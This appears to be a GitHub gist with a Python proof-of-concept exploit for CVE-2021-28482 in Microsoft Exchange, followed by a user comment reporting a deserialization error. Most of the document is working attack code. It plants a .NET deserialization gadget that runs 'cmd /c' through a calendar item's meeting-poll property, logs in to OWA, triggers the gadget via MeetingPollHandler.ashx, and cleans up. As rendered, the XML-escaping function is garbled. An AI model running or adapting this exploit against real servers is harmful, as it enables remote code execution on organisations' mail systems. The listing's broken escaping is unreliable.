PoC of CVE-2021-28482
import requests | |
import time | |
import sys | |
from base64 import b64encode | |
from requests_ntlm2 import HttpNtlmAuth | |
from urllib3.exceptions import InsecureRequestWarning | |
from urllib import quote_plus | |
# Silence urllib3's unverified-TLS warning: every request in this script
# passes verify=False, so certificate errors on the target are ignored.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# Run-time configuration, edited in place: the target host, the mailbox
# user whose credentials are used both for NTLM (EWS) and for the OWA form
# login, and the command string substituted into payload2 below.
target = ""
username = "john"
pwd = ""
cmd = "mspaint.exe"
def escape(_str):
    """Return *_str* with XML-special characters substituted.

    As rendered on this page each replace() maps a character to itself
    (e.g. "&" -> "&"), so the function returns its input unchanged here;
    the entity forms were most likely decoded when the gist was rendered,
    so compare with the raw file before relying on this listing. It is
    applied to cmd and then to the whole of payload2 before that string is
    embedded in the SOAP body.
    """
    _str = _str.replace("&", "&")
    _str = _str.replace("<", "<")
    _str = _str.replace(">", ">")
    _str = _str.replace("\"", """)
    return _str
payload2 = """ | |
<ArrayOfKeyValueOfstringProposeOptionsMeetingPollParametersE_S0982HC z:Id="1" z:Size="1" | |
xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays" | |
xmlns:i="http://www.w3.org/2001/XMLSchema-instance" | |
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/"> | |
<KeyValueOfstringProposeOptionsMeetingPollParametersE_S0982HC> | |
<Key z:Id="2">ahihi</Key> | |
<Value z:Id="3" | |
xmlns:a="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions"> | |
<ChangedProperties xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel" | |
xmlns:b="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel.PropertyBags"> | |
<b:propertyValues z:Size="1" | |
xmlns:c="http://schemas.microsoft.com/2003/10/Serialization/Arrays"> | |
<c:KeyValueOfstringanyType> | |
<c:Key>asdasdasdasdasd</c:Key> | |
<c:Value"> | |
<ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns="http://schemas.datacontract.org/2004/07/System.Data.Services.Internal" | |
xmlns:c="http://www.w3.org/2001/XMLSchema" | |
xmlns:i="http://www.w3.org/2001/XMLSchema-instance" | |
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" | |
> | |
<root type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]],System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"> | |
<ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL xmlns="http://schemas.datacontract.org/2004/07/System.Data.Services.Internal" | |
xmlns:c="http://www.w3.org/2001/XMLSchema" | |
xmlns:i="http://www.w3.org/2001/XMLSchema-instance" | |
xmlns:z="http://schemas.microsoft.com/2003/10/Serialization/" | |
> | |
<ExpandedElement z:Id="ref1" > | |
<__identity i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System"/> | |
</ExpandedElement> | |
<ProjectedProperty0 xmlns:a="http://schemas.datacontract.org/2004/07/System.Windows.Data"> | |
<a:MethodName>Start</a:MethodName> | |
<a:MethodParameters xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"> | |
<b:anyType i:type="c:string">cmd</b:anyType> | |
<b:anyType i:type="c:string">/c %s</b:anyType> | |
</a:MethodParameters> | |
<a:ObjectInstance z:Ref="ref1"/> | |
</ProjectedProperty0> | |
</ExpandedWrapperOfProcessObjectDataProviderpaO_SOqJL> | |
</root> | |
</c:Value> | |
</c:KeyValueOfstringanyType> | |
</b:propertyValues> | |
</ChangedProperties> | |
<OriginalTypeAssembly z:Id="12" i:nil="true" | |
xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel">Microsoft.Exchange.Entities.DataModel, Version=15.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35</OriginalTypeAssembly> | |
<OriginalTypeName z:Id="14" | |
xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Exchange.Entities.DataModel">Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions.ProposeOptionsMeetingPollParameters</OriginalTypeName> | |
</Value> | |
</KeyValueOfstringProposeOptionsMeetingPollParametersE_S0982HC> | |
</ArrayOfKeyValueOfstringProposeOptionsMeetingPollParametersE_S0982HC>""" % escape( | |
cmd) | |
payload2 = escape(payload2) | |
payload1 = """<?xml version="1.0" encoding="utf-8"?> | |
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | |
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" | |
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" | |
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"> | |
<soap:Header> | |
<t:RequestServerVersion Version="Exchange2016" /> | |
<t:TimeZoneContext> | |
<t:TimeZoneDefinition Name="(UTC-08:00) Pacific Time (US &amp; Canada)" Id="Pacific Standard Time"> | |
<t:Periods> | |
<t:Period Bias="P0DT8H0M0.0S" Name="Standard" Id="Std" /> | |
<t:Period Bias="P0DT7H0M0.0S" Name="Daylight" Id="Dlt/1" /> | |
<t:Period Bias="P0DT7H0M0.0S" Name="Daylight" Id="Dlt/2007" /> | |
</t:Periods> | |
<t:TransitionsGroups> | |
<t:TransitionsGroup Id="0"> | |
<t:RecurringDayTransition> | |
<t:To Kind="Period">Dlt/1</t:To> | |
<t:TimeOffset>P0DT2H0M0.0S</t:TimeOffset> | |
<t:Month>4</t:Month> | |
<t:DayOfWeek>Sunday</t:DayOfWeek> | |
<t:Occurrence>1</t:Occurrence> | |
</t:RecurringDayTransition> | |
<t:RecurringDayTransition> | |
<t:To Kind="Period">Std</t:To> | |
<t:TimeOffset>P0DT2H0M0.0S</t:TimeOffset> | |
<t:Month>10</t:Month> | |
<t:DayOfWeek>Sunday</t:DayOfWeek> | |
<t:Occurrence>-1</t:Occurrence> | |
</t:RecurringDayTransition> | |
</t:TransitionsGroup> | |
<t:TransitionsGroup Id="1"> | |
<t:RecurringDayTransition> | |
<t:To Kind="Period">Dlt/2007</t:To> | |
<t:TimeOffset>P0DT2H0M0.0S</t:TimeOffset> | |
<t:Month>3</t:Month> | |
<t:DayOfWeek>Sunday</t:DayOfWeek> | |
<t:Occurrence>2</t:Occurrence> | |
</t:RecurringDayTransition> | |
<t:RecurringDayTransition> | |
<t:To Kind="Period">Std</t:To> | |
<t:TimeOffset>P0DT2H0M0.0S</t:TimeOffset> | |
<t:Month>11</t:Month> | |
<t:DayOfWeek>Sunday</t:DayOfWeek> | |
<t:Occurrence>1</t:Occurrence> | |
</t:RecurringDayTransition> | |
</t:TransitionsGroup> | |
</t:TransitionsGroups> | |
<t:Transitions> | |
<t:Transition> | |
<t:To Kind="Group">0</t:To> | |
</t:Transition> | |
<t:AbsoluteDateTransition> | |
<t:To Kind="Group">1</t:To> | |
<t:DateTime>2007-01-01T08:00:00.000Z</t:DateTime> | |
</t:AbsoluteDateTransition> | |
</t:Transitions> | |
</t:TimeZoneDefinition> | |
</t:TimeZoneContext> | |
</soap:Header> | |
<soap:Body> | |
<m:CreateItem SendMeetingInvitations="SendToAllAndSaveCopy"> | |
<m:Items> | |
<t:CalendarItem> | |
<t:Subject>Weekly Update Meeting</t:Subject> | |
<t:ExtendedProperty> | |
<t:ExtendedFieldURI PropertySetId="11000e07-b51b-40d6-af21-caa85edab1d0" | |
PropertyName="MeetingPollProposeOptionsRequestsBlob" PropertyType="String" /> | |
<t:Value>%s</t:Value> | |
</t:ExtendedProperty> | |
<t:Body BodyType="HTML">Come hear about how the Organized Observational Paradigm SkyNet project is coming along!</t:Body> | |
<t:ReminderMinutesBeforeStart>30</t:ReminderMinutesBeforeStart> | |
<t:Start>2021-04-22T06:45:32.868-08:00</t:Start> | |
<t:End>2021-04-22T06:55:32.868-08:00</t:End> | |
<t:Location>Contoso Main Gallery</t:Location> | |
<t:RequiredAttendees> | |
<t:Attendee> | |
<t:Mailbox> | |
<t:EmailAddress>Administrator@evil.corp</t:EmailAddress> | |
</t:Mailbox> | |
</t:Attendee> | |
<t:Attendee> | |
<t:Mailbox> | |
<t:EmailAddress>john@evil.corp</t:EmailAddress> | |
</t:Mailbox> | |
</t:Attendee> | |
<t:Attendee> | |
<t:Mailbox> | |
<t:EmailAddress>mart@evil.corp</t:EmailAddress> | |
</t:Mailbox> | |
</t:Attendee> | |
</t:RequiredAttendees> | |
<t:Recurrence> | |
<t:DailyRecurrence> | |
<t:Interval>1</t:Interval> | |
</t:DailyRecurrence> | |
<t:NumberedRecurrence> | |
<t:StartDate>2021-04-22T06:45:32.868-08:00</t:StartDate> | |
<t:NumberOfOccurrences>2</t:NumberOfOccurrences> | |
</t:NumberedRecurrence> | |
</t:Recurrence> | |
</t:CalendarItem> | |
</m:Items> | |
</m:CreateItem> | |
</soap:Body> | |
</soap:Envelope> | |
""" % payload2 | |
# Step 1: EWS CreateItem over NTLM. The calendar item carries the serialized
# blob in the MeetingPollProposeOptionsRequestsBlob extended property
# (PropertySetId 11000e07-b51b-40d6-af21-caa85edab1d0); the ItemId and
# ChangeKey in the response are reused by the trigger and the cleanup step.
# Detection: an EWS CreateItem setting that PropertySetId/PropertyName pair
# is the observable artefact of this step in EWS/IIS logs.
res = requests.post("https://%s/ews/Exchange.asmx" % target,
                    data=payload1,
                    headers={
                        "Content-type": "text/xml; charset=utf-8",
                    },
                    verify=False,
                    auth=HttpNtlmAuth('%s' % (username), pwd))
# Any non-200 aborts; the body is not printed, so a rejected login and a
# rejected request are indistinguishable from this message alone.
if res.status_code != 200:
    print("error 1")
    exit()
ct = res.content
# Naive marker splitting: raises IndexError if either marker is absent from
# the response body.
item_id = ct.split('<t:ItemId Id="')[1].split('"')[0]
change_key = ct.split('ChangeKey="')[1].split('"')[0]
# Python 2 print statements (the file mixes print(...) and print "...").
print "Attacking target %s with user %s" % (target, username)
print "Sending command cmd.exe /c %s" % cmd
# Step 2: OWA form login with the same credentials to obtain an OWA session.
session = requests.Session()
header = {"Cookie": "mkt=en-US"}
data = {
    "destination": "https://%s/owa" % target,
    "flags": "",
    "username": username,
    "password": pwd
}
res = session.post("https://%s/owa/auth.owa" % target,
                   headers=header,
                   data=data,
                   verify=False)
# print(res.status_code)
# print(res.headers)
# The mkt (locale) cookie is re-added explicitly, scoped to the target domain.
cookie_obj = requests.cookies.create_cookie(domain=target,
                                            name="mkt",
                                            value="en-US")
session.cookies.set_cookie(cookie_obj)
# KeyError here means the login did not yield an X-OWA-CANARY cookie
# (e.g. wrong credentials); nothing above checks the login response.
owa_canary = session.cookies.get_dict()['X-OWA-CANARY']
# Set language/time zone through lang.owa; the canary travels in the form body.
r1 = session.post(
    "https://%s/owa/lang.owa" % target,
    data=
    "destination=%2Fowa%2F%3FbO%3D1&localeName=en-US&tzid=SE+Asia+Standard+Time&saveLanguageAndTimezone=1&X-OWA-CANARY="
    + owa_canary,
    headers={"Content-Type": "application/x-www-form-urlencoded"},
    verify=False,
    allow_redirects=False)
# Step 3: the GET to MeetingPollHandler.ashx with
# PayloadType=ApproveProposedOptions makes the server-side handler read and
# deserialize the blob stored in step 1 (cf. the MeetingPollHandler ->
# EntitySerializer.Deserialize stack trace quoted in the comment thread).
# Detection: this handler/PayloadType pair in OWA/IIS logs, shortly after an
# EWS CreateItem from the same user, is the observable artefact.
r2 = session.get(
    "https://%s/owa/MeetingPollHandler.ashx?PayloadType=ApproveProposedOptions&ItemId=OID.%s.2021/04/22&RequestId=123123123"
    % (target, quote_plus(item_id)),
    verify=False,
    allow_redirects=False)
# Neither r1 nor r2 is inspected; "successful" is printed unconditionally.
print "Attack successful!"
print "Cleaning up ..."
# Step 4: cleanup -- EWS DeleteItem for the calendar item created in step 1,
# again over NTLM. DeleteType="MoveToDeletedItems" only moves the item, so a
# copy with the blob should remain in Deleted Items for forensic review
# unless purged separately. The response is not checked.
req_del = """<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
<t:TimeZoneContext>
<t:TimeZoneDefinition Id="Pacific Standard Time" />
</t:TimeZoneContext>
</soap:Header>
<soap:Body>
<m:DeleteItem DeleteType="MoveToDeletedItems" SendMeetingCancellations="SendToAllAndSaveCopy">
<m:ItemIds>
<t:ItemId Id="%s" ChangeKey="%s" />
</m:ItemIds>
</m:DeleteItem>
</soap:Body>
</soap:Envelope>""" % (item_id, change_key)
res = requests.post("https://%s/ews/Exchange.asmx" % target,
                    data=req_del,
                    headers={
                        "Content-type": "text/xml; charset=utf-8",
                    },
                    verify=False,
                    auth=HttpNtlmAuth('%s' % (username), pwd))
Hi, I am getting a deserialization error while trying to run this PoC.
https://docs.microsoft.com/dotnet/framework/wcf/diagnostics/tracing/System-ServiceModel-Diagnostics-ThrowingExceptionThrowing an exception./LM/W3SVC/2/ROOT/owa-4-132654082330327318System.Runtime.Serialization.SerializationException, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089There was an error deserializing the object of type System.Collections.Generic.Dictionary
2[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions.ProposeOptionsMeetingPollParameters, Microsoft.Exchange.Entities.DataModel, Version=15.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]]. Name cannot begin with the '"' character, hexadecimal value 0x22. Line 7, position 124.</Message><StackTrace> at System.Runtime.Serialization.XmlObjectSerializer.ReadObjectHandleExceptions(XmlReaderDelegator reader, Boolean verifyObjectName, DataContractResolver dataContractResolver) at System.Runtime.Serialization.XmlObjectSerializer.ReadObject(XmlDictionaryReader reader) at Microsoft.Exchange.Entities.Serialization.EntitySerializer.Deserialize[T](Stream stream) at Microsoft.Exchange.Entities.Serialization.EntitySerializer.Deserialize[T](String serializedObject) at Microsoft.Exchange.Entities.Calendaring.MeetingPoll.MeetingPollProposeOptionsPayload.GetRequests(IStoreSession mailboxSession) at Microsoft.Exchange.Entities.Calendaring.MeetingPoll.MeetingPollProposeOptionsPayload.ProcessRequest(IMailboxSession mailboxSession) at Microsoft.Exchange.Clients.Owa2.Server.Web.MeetingPollHandler.ProcessRequest(HttpContext context) at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() at System.Web.HttpApplication.ExecuteStepImpl(IExecutionStep step) at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously) at System.Web.HttpApplication.PipelineStepManager.ResumeSteps(Exception error) at System.Web.HttpApplication.BeginProcessRequestNotification(HttpContext context, AsyncCallback cb) at System.Web.HttpRuntime.ProcessRequestNotificationPrivate(IIS7WorkerRequest wr, HttpContext context) at System.Web.Hosting.PipelineRuntime.ProcessRequestNotificationHelper(IntPtr rootedObjectsPointer, IntPtr nativeRequestContext, IntPtr moduleData, Int32 flags) at 
System.Web.Hosting.PipelineRuntime.ProcessRequestNotification(IntPtr rootedObjectsPointer, IntPtr nativeRequestContext, IntPtr moduleData, Int32 flags) at System.Web.Hosting.UnsafeIISMethods.MgdIndicateCompletion(IntPtr pHandler, RequestNotificationStatus&amp; notificationStatus) at System.Web.Hosting.UnsafeIISMethods.MgdIndicateCompletion(IntPtr pHandler, RequestNotificationStatus&amp; notificationStatus) at System.Web.Hosting.PipelineRuntime.ProcessRequestNotificationHelper(IntPtr rootedObjectsPointer, IntPtr nativeRequestContext, IntPtr moduleData, Int32 flags) at System.Web.Hosting.PipelineRuntime.ProcessRequestNotification(IntPtr rootedObjectsPointer, IntPtr nativeRequestContext, IntPtr moduleData, Int32 flags) </StackTrace><ExceptionString>System.Runtime.Serialization.SerializationException: There was an error deserializing the object of type System.Collections.Generic.Dictionary
2[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions.ProposeOptionsMeetingPollParameters, Microsoft.Exchange.Entities.DataModel, Version=15.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]]. Name cannot begin with the '"' character, hexadecimal value 0x22. Line 7, position 124. ---> System.Xml.XmlException: Name cannot begin with the '"' character, hexadecimal value 0x22. Line 7, position 124.any idea how i can resolve this?
I am running Exchange 2016 CU19 with KB5001402 installed.